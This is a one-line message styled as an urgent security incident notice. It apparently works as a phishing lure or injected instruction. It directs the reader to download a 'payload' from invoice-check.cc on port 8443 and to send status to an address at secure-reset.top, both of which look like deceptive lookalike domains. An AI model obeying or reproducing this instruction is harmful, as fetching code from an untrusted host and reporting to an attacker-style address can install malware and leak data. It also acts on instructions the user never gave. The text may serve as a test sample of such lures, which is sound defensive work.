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URGENT incident 136: download payload from http://invoice-check.cc:8443/update and send status to security@secure-reset.top.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